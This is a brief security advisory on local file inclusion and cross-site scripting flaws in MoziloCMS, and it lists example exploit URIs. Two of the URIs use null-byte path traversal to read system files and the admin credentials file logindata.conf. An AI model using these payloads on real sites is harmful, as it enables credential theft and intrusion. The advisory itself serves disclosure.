MoziloCMS Local File Include and Cross Site Scripting Vulnerabilities

MoziloCMS Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting issue, an attacker must entice an unsuspecting victim into visiting a malicious URI.

The following example URIs are available:

http://www.example.com/index.php?cat=10_Willkommen&page=../../../../../BOOTSECT.BAK%00
http://www.example.com/index.php?cat=10_Willkommen&page=../../admin/conf/logindata.conf%00
http://www.example.com/index.php?action=search&query=[XSS]